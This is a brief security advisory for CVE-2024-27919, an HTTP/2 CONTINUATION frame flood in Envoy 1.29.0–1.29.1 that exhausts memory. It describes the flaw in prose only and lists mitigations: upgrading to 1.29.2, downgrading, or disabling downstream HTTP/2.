CVE-2024-27919

Name of the Vulnerable Software and Affected Versions Envoy versions 1.29.0 through 1.29.1

Description The issue is related to the Envoy HTTP/2 protocol stack, which is vulnerable to a flood of CONTINUATION frames. This occurs because Envoy's HTTP/2 codec does not reset a request when header map limits have been exceeded, allowing an attacker to send a sequence of CONTINUATION frames without the END HEADERS bit set, causing unlimited memory consumption. This can lead to denial of service through memory exhaustion.

Recommendations For Envoy versions 1.29.0 and 1.29.1, upgrade to version 1.29.2 to mitigate the effects of the CONTINUATION flood. As a temporary workaround for versions 1.29.0 and 1.29.1, consider downgrading to version 1.28.1 or earlier. Alternatively, for versions 1.29.0 and 1.29.1, disable the HTTP/2 protocol for downstream connections as a workaround.